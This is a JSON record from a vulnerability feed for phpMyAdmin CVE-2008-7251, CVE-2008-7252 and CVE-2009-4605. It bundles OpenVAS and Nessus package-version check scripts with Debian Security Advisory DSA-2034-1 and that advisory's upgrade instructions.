setup.php script shipped with phpMyAdmin may unserialize untrusted\ndata, allowing for cross site request forgery.\n\n\nFor the stable distribution (lenny), these problems have been fixed in version\nphpmyadmin 2.11.8.1-5+lenny4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 3.2.4-1.\n\nWe recommend that you upgrade your phpmyadmin package.\";\ntag_summary = \"The remote host is missing an update to phpmyadmin\nannounced via advisory DSA 2034-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202034-1\";\n\n\nif(description)\n{\n script_id(67338);\n script_version(\"$Revision: 6614 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:12 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-04 05:52:15 +0200 (Tue, 04 May 2010)\");\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2009-4605\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 2034-1 (phpmyadmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"phpmyadmin\", ver:\"2.11.8.1-5+lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2020-02-01T02:13:42", "bulletinFamily": "scanner", "description": "The use of unserialize() on POST data which could have lead to remote\ncode execution (CVE-2009-4605) has been fixed as well as some minor\ntemporary file issues (CVE-2008-7251, CVE-2008-7252).", "modified": "2020-02-02T00:00:00", "id": "SUSE_11_0_PHPMYADMIN-091209.NASL", "href": "https://www.tenable.com/plugins/nessus/44044", "published": "2010-01-18T00:00:00", "title": "openSUSE Security Update : phpMyAdmin (phpMyAdmin-1801)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update phpMyAdmin-1801.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44044);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/10/25 13:36:34\");\n\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2009-4605\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (phpMyAdmin-1801)\");\n script_summary(english:\"Check for the phpMyAdmin-1801 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The use of unserialize() on POST data which could have lead to remote\ncode execution (CVE-2009-4605) has been fixed as well as some minor\ntemporary file issues (CVE-2008-7251, CVE-2008-7252).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=559569\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"phpMyAdmin-2.11.9.6-0.3\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-01T06:52:38", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in phpMyAdmin, a tool to\nadminister MySQL over the web. The Common Vulnerabilities and\nExposures project identifies the following problems :\n\n - CVE-2008-7251\n phpMyAdmin may create a temporary directory, if the\n configured directory does not exist yet, with insecure\n filesystem permissions.\n\n - CVE-2008-7252\n phpMyAdmin uses predictable filenames for temporary\n files, which may lead to a local denial of service\n attack or privilege escalation.\n\n - CVE-2009-4605\n The setup.php script shipped with phpMyAdmin may\n unserialize untrusted data, allowing for cross site\n request forgery.", "modified": "2020-02-02T00:00:00", "id": "DEBIAN_DSA-2034.NASL", "href": "https://www.tenable.com/plugins/nessus/45556", "published": "2010-04-19T00:00:00", "title": "Debian DSA-2034-1 : phpmyadmin - several vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2034. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(45556);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/08/02 13:32:22\");\n\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2009-4605\");\n script_bugtraq_id(37826);\n script_xref(name:\"DSA\", value:\"2034\");\n\n script_name(english:\"Debian DSA-2034-1 : phpmyadmin - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in phpMyAdmin, a tool to\nadminister MySQL over the web. The Common Vulnerabilities and\nExposures project identifies the following problems :\n\n - CVE-2008-7251\n phpMyAdmin may create a temporary directory, if the\n configured directory does not exist yet, with insecure\n filesystem permissions.\n\n - CVE-2008-7252\n phpMyAdmin uses predictable filenames for temporary\n files, which may lead to a local denial of service\n attack or privilege escalation.\n\n - CVE-2009-4605\n The setup.php script shipped with phpMyAdmin may\n unserialize untrusted data, allowing for cross site\n request forgery.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-7251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-7252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-4605\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2010/dsa-2034\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the phpmyadmin package.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion phpmyadmin 2.11.8.1-5+lenny4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"phpmyadmin\", reference:\"2.11.8.1-5+lenny4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-10-24T22:45:15", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2034-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nApril 17, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : phpmyadmin\nVulnerability : several\nProblem type : local/remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-7251 CVE-2008-7252 CVE-2009-4605\n\nSeveral vulnerabilities have been discovered in phpMyAdmin, a tool\nto administer MySQL over the web. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2008-7251\n\n phpMyAdmin may create a temporary directory, if the configured directory\n does not exist yet, with insecure filesystem permissions.\n\nCVE-2008-7252\n\n phpMyAdmin uses predictable filenames for temporary files, which may\n lead to a local denial of service attack or privilege escalation.\n\nCVE-2009-4605\n\n The setup.php script shipped with phpMyAdmin may unserialize untrusted\n data, allowing for cross site request forgery.\n\n\nFor the stable distribution (lenny), these problems have been fixed in version\nphpmyadmin 2.11.8.1-5+lenny4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 3.2.4-1.\n\nWe recommend that you upgrade your phpmyadmin package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny4.dsc\n Size/MD5 checksum: 1548 70357c2a96c6299a24cd7ad1ce2c99a6\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny4.diff.gz\n Size/MD5 checksum: 69878 16131d1f08db63eafc8c08e7743461f4\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.11.8.1.orig.tar.gz\n Size/MD5 checksum: 2870014 075301d16404c2d7d58216efc14f7a50\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny4_all.deb\n Size/MD5 checksum: 2883680 bd7220bf95adb17384462ff6d5246165\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "modified": "2010-04-17T12:36:05", "published": "2010-04-17T12:36:05", "id": "DEBIAN:DSA-2034-1:622E3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00074.html", "title": "[SECURITY] [DSA 2034-1] New phpmyadmin packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}